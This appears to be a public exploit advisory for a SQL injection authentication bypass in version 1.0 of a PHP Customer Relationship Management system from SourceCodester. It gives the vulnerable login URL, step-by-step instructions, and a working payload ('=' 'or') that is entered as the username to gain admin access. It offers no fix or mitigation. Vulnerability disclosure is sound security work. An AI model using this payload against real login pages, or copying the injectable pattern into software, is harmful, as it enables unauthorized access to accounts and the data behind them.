# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass# Date: 27/07/2021# Exploit Author: Shafique_Wasta# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip# Version: 1# Tested on: Windows 10/xampp# DESCRIPTION ## Customer relationship management system is vulnerable to Sql Injection Auth Bypass# Exploit Working:# 1. Visit on localhostcrm/customer/login.php# 2. You will see the login panel# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.# Vulnerable URL :http://localhost/crm/customer/login.php# Payload: '=' 'or'
